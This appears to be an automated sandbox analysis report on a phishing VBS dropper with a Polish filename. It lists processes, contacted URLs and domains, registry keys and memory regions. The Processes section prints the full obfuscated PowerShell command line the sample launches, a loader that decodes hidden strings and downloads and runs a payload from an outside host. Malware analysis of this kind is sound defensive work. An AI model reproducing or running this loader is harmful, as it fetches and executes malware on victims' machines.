Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs
|
ASCII text, with very long lines (1111), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23kl5m5z.pxu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa2gxs0x.djv.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c ping aszzzw_6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping aszzzw_6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas
#>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If
($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst;
for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function
Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl
AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd.
B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri
FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3
Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus
'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta
iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus
' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA
pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc
issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se
Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP
SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd
frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI
rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT
Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus
'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf
TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM
Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140
(Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi
t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB
riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin
f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro
MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit
oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb
A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2
uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen
onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140
(Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R
sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda
Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl
Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr
DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140
(Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG
meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140
(Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway
AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS
oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140
(Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy
tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg
Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140
(Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP
raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M
rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://govallc.org
|
unknown
|
||
|
https://govallc.org/redningsblternes.asiP
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
There are 2 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
aszzzw_6777.6777.6777.677e
|
unknown
|
|
|
|
govallc.org
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2A2C652B000
|
trusted library allocation
|
page read and write
|
||
|
598C2FF000
|
stack
|
page read and write
|
||
|
7FFAAC652000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6598000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA21000
|
heap
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
21DDFA70000
|
heap
|
page read and write
|
||
|
21DDF9E3000
|
heap
|
page read and write
|
||
|
2A2C6217000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA02000
|
heap
|
page read and write
|
||
|
2A2C30F5000
|
heap
|
page read and write
|
||
|
9FBCBFF000
|
stack
|
page read and write
|
||
|
F32A1BC000
|
stack
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9CE000
|
heap
|
page read and write
|
||
|
2A2C4950000
|
trusted library section
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD130000
|
heap
|
page read and write
|
||
|
2A2C5C93000
|
trusted library allocation
|
page read and write
|
||
|
1FF2DDD0000
|
heap
|
page read and write
|
||
|
2A2C30B0000
|
heap
|
page read and write
|
||
|
2A2C5B3F000
|
trusted library allocation
|
page read and write
|
||
|
F32A03E000
|
stack
|
page read and write
|
||
|
F32AC0D000
|
stack
|
page read and write
|
||
|
21DDF9BF000
|
heap
|
page read and write
|
||
|
2A2C4CFC000
|
heap
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DDF9C9000
|
heap
|
page read and write
|
||
|
2A2C6677000
|
trusted library allocation
|
page read and write
|
||
|
2A2C30D3000
|
heap
|
page read and write
|
||
|
2A2C6744000
|
trusted library allocation
|
page read and write
|
||
|
1FF2DC60000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6981000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4C8B000
|
heap
|
page read and write
|
||
|
2A2C652E000
|
trusted library allocation
|
page read and write
|
||
|
21DDF998000
|
heap
|
page read and write
|
||
|
21DDF9CE000
|
heap
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
2A2C3040000
|
heap
|
page read and write
|
||
|
21DDF9E0000
|
heap
|
page read and write
|
||
|
21DDF9F1000
|
heap
|
page read and write
|
||
|
2A2C5F40000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6561000
|
trusted library allocation
|
page read and write
|
||
|
2A2C5B48000
|
trusted library allocation
|
page read and write
|
||
|
2A2D4F76000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD154000
|
heap
|
page read and write
|
||
|
1FF2DA8B000
|
heap
|
page read and write
|
||
|
2A2C63FB000
|
trusted library allocation
|
page read and write
|
||
|
598BAFE000
|
stack
|
page read and write
|
||
|
2A2C56A6000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6514000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4E44000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC526000
|
trusted library allocation
|
page read and write
|
||
|
9FBC7AB000
|
stack
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DDFA17000
|
heap
|
page read and write
|
||
|
F329CFE000
|
stack
|
page read and write
|
||
|
21DDFC59000
|
heap
|
page read and write
|
||
|
2A2C63EF000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9C7000
|
heap
|
page read and write
|
||
|
2A2C4960000
|
trusted library section
|
page read and write
|
||
|
7FFAAC472000
|
trusted library allocation
|
page read and write
|
||
|
F329773000
|
stack
|
page read and write
|
||
|
598C3FB000
|
stack
|
page read and write
|
||
|
7FFAAC621000
|
trusted library allocation
|
page read and write
|
||
|
F329C7E000
|
stack
|
page read and write
|
||
|
2A2C6360000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
2A2C49D5000
|
heap
|
page read and write
|
||
|
2A2C66B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC474000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4BC0000
|
heap
|
page read and write
|
||
|
2A2C6774000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4990000
|
trusted library allocation
|
page read and write
|
||
|
2A2C5314000
|
trusted library allocation
|
page read and write
|
||
|
598BFFE000
|
stack
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DE1741000
|
heap
|
page read and write
|
||
|
2A2C6715000
|
trusted library allocation
|
page read and write
|
||
|
21DDFC55000
|
heap
|
page read and write
|
||
|
2A2C30FF000
|
heap
|
page read and write
|
||
|
21DDF9AD000
|
heap
|
page read and write
|
||
|
2A2C6866000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA42000
|
heap
|
page read and write
|
||
|
21DDF9DA000
|
heap
|
page read and write
|
||
|
2A2C49E0000
|
trusted library allocation
|
page read and write
|
||
|
2A2C62E8000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA4A000
|
heap
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
2A2C3020000
|
heap
|
page read and write
|
||
|
21DE1740000
|
heap
|
page read and write
|
||
|
21DDF9C7000
|
heap
|
page read and write
|
||
|
2A2D4DD0000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD100000
|
heap
|
page execute and read and write
|
||
|
F329B7C000
|
stack
|
page read and write
|
||
|
2A2C6F4B000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9D9000
|
heap
|
page read and write
|
||
|
2A2DD150000
|
heap
|
page read and write
|
||
|
21DDFC58000
|
heap
|
page read and write
|
||
|
2A2C6B57000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD2A9000
|
heap
|
page read and write
|
||
|
7DF4FD620000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DDF99E000
|
heap
|
page read and write
|
||
|
2A2C5817000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page execute and read and write
|
||
|
21DDFA17000
|
heap
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
21DDF9B0000
|
heap
|
page read and write
|
||
|
9FBCAFF000
|
unkown
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
21DDF9F1000
|
heap
|
page read and write
|
||
|
2A2C685C000
|
trusted library allocation
|
page read and write
|
||
|
2A2C5D25000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C6214000
|
trusted library allocation
|
page read and write
|
||
|
21DDF99E000
|
heap
|
page read and write
|
||
|
2A2C4CC5000
|
heap
|
page read and write
|
||
|
2A2C4DB0000
|
heap
|
page execute and read and write
|
||
|
21DDF9F1000
|
heap
|
page read and write
|
||
|
598BDFE000
|
stack
|
page read and write
|
||
|
21DDFA17000
|
heap
|
page read and write
|
||
|
2A2C5A10000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9F6000
|
heap
|
page read and write
|
||
|
598C0FE000
|
stack
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
598B9FE000
|
stack
|
page read and write
|
||
|
21DDF9C7000
|
heap
|
page read and write
|
||
|
21DE13F0000
|
heap
|
page read and write
|
||
|
2A2DD24C000
|
heap
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
21DDF9D5000
|
heap
|
page read and write
|
||
|
1FF2DA80000
|
heap
|
page read and write
|
||
|
2A2C4C40000
|
heap
|
page read and write
|
||
|
21DDFA02000
|
heap
|
page read and write
|
||
|
21DDF99D000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
1FF2DAA6000
|
heap
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
2A2C65CC000
|
trusted library allocation
|
page read and write
|
||
|
2A2C5D57000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC48B000
|
trusted library allocation
|
page read and write
|
||
|
2A2C313D000
|
heap
|
page read and write
|
||
|
2A2C6CAA000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4FE7000
|
trusted library allocation
|
page read and write
|
||
|
F329DBF000
|
stack
|
page read and write
|
||
|
F329AFE000
|
stack
|
page read and write
|
||
|
F32AB3A000
|
stack
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C5364000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA12000
|
heap
|
page read and write
|
||
|
2A2C64AF000
|
trusted library allocation
|
page read and write
|
||
|
2A2C698D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC62A000
|
trusted library allocation
|
page read and write
|
||
|
2A2C543F000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA12000
|
heap
|
page read and write
|
||
|
2A2C6330000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
21DE1746000
|
heap
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
21DDF890000
|
heap
|
page read and write
|
||
|
2A2C63FE000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9FB000
|
heap
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
|
598B8FA000
|
stack
|
page read and write
|
||
|
21DDFA12000
|
heap
|
page read and write
|
||
|
2A2C4D22000
|
heap
|
page read and write
|
||
|
2A2C49A0000
|
heap
|
page readonly
|
||
|
21DDF9F2000
|
heap
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9F1000
|
heap
|
page read and write
|
||
|
21DDF9CC000
|
heap
|
page read and write
|
||
|
F329E37000
|
stack
|
page read and write
|
||
|
2A2C631F000
|
trusted library allocation
|
page read and write
|
||
|
2A2C68EF000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
F32AB8E000
|
stack
|
page read and write
|
||
|
2A2C4C20000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD560000
|
heap
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9F8000
|
heap
|
page read and write
|
||
|
21DDFA90000
|
heap
|
page read and write
|
||
|
2A2C2F40000
|
heap
|
page read and write
|
||
|
21DDFA17000
|
heap
|
page read and write
|
||
|
21DDF9D5000
|
heap
|
page read and write
|
||
|
21DDF979000
|
heap
|
page read and write
|
||
|
F32A0BE000
|
stack
|
page read and write
|
||
|
2A2C49D0000
|
heap
|
page read and write
|
||
|
2A2C5310000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA12000
|
heap
|
page read and write
|
||
|
F329EB8000
|
stack
|
page read and write
|
||
|
1FF2DC80000
|
heap
|
page read and write
|
||
|
2A2C4A5A000
|
heap
|
page read and write
|
||
|
21DDF9DA000
|
heap
|
page read and write
|
||
|
21DDF9E5000
|
heap
|
page read and write
|
||
|
21DE174E000
|
heap
|
page read and write
|
||
|
2A2C30BD000
|
heap
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
2A2DD2E1000
|
heap
|
page read and write
|
||
|
21DDFA02000
|
heap
|
page read and write
|
||
|
2A2C65E1000
|
trusted library allocation
|
page read and write
|
||
|
1FF2DCA0000
|
heap
|
page read and write
|
||
|
2A2C5C71000
|
trusted library allocation
|
page read and write
|
||
|
598C1FF000
|
stack
|
page read and write
|
||
|
2A2C4C23000
|
trusted library allocation
|
page read and write
|
||
|
2A2C69B6000
|
trusted library allocation
|
page read and write
|
||
|
21DDFA45000
|
heap
|
page read and write
|
||
|
2A2C649C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
21DDF9E5000
|
heap
|
page read and write
|
||
|
2A2C52F7000
|
trusted library allocation
|
page read and write
|
||
|
2A2C3115000
|
heap
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C523D000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4C8D000
|
heap
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
2A2C6543000
|
trusted library allocation
|
page read and write
|
||
|
2A2C3090000
|
heap
|
page read and write
|
||
|
21DDFA1F000
|
heap
|
page read and write
|
||
|
2A2C49B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC47D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C6813000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4A10000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6E48000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD294000
|
heap
|
page read and write
|
||
|
2A2C4970000
|
trusted library allocation
|
page read and write
|
||
|
1FF2DB80000
|
heap
|
page read and write
|
||
|
21DDFC50000
|
heap
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
2A2C5E3E000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6F49000
|
trusted library allocation
|
page read and write
|
||
|
F32AC88000
|
stack
|
page read and write
|
||
|
2A2C5B10000
|
trusted library allocation
|
page read and write
|
||
|
21DE1750000
|
heap
|
page read and write
|
||
|
21DDF9D5000
|
heap
|
page read and write
|
||
|
2A2D4E34000
|
trusted library allocation
|
page read and write
|
||
|
2A2C67B5000
|
trusted library allocation
|
page read and write
|
||
|
2A2C4DC1000
|
trusted library allocation
|
page read and write
|
||
|
2A2D50AE000
|
trusted library allocation
|
page read and write
|
||
|
2A2C6990000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
1FF2DAA4000
|
heap
|
page read and write
|
||
|
F32A13E000
|
stack
|
page read and write
|
||
|
21DDFA40000
|
heap
|
page read and write
|
||
|
598BCFF000
|
stack
|
page read and write
|
||
|
2A2C6490000
|
trusted library allocation
|
page read and write
|
||
|
2A2C313F000
|
heap
|
page read and write
|
||
|
2A2C65D8000
|
trusted library allocation
|
page read and write
|
||
|
2A2C30FB000
|
heap
|
page read and write
|
||
|
2A2C5C69000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD272000
|
heap
|
page read and write
|
||
|
2A2C5C90000
|
trusted library allocation
|
page read and write
|
||
|
21DDF970000
|
heap
|
page read and write
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
2A2C67A6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC49D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C633A000
|
trusted library allocation
|
page read and write
|
||
|
2A2C68E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9DA000
|
heap
|
page read and write
|
||
|
7FFAAC556000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC52C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C6B5D000
|
trusted library allocation
|
page read and write
|
||
|
2A2D4DC1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
F329D79000
|
stack
|
page read and write
|
||
|
2A2C3050000
|
heap
|
page read and write
|
||
|
21DDFA12000
|
heap
|
page read and write
|
||
|
2A2C4C37000
|
heap
|
page execute and read and write
|
||
|
2A2C3045000
|
heap
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
2A2DD230000
|
heap
|
page read and write
|
||
|
21DDF9BB000
|
heap
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC473000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A2C4CCD000
|
heap
|
page read and write
|
||
|
2A2C4D29000
|
heap
|
page read and write
|
||
|
2A2C653A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9DD000
|
heap
|
page read and write
|
||
|
21DDFA17000
|
heap
|
page read and write
|
||
|
21DDFA02000
|
heap
|
page read and write
|
||
|
21DDFA02000
|
heap
|
page read and write
|
||
|
2A2C68B1000
|
trusted library allocation
|
page read and write
|
||
|
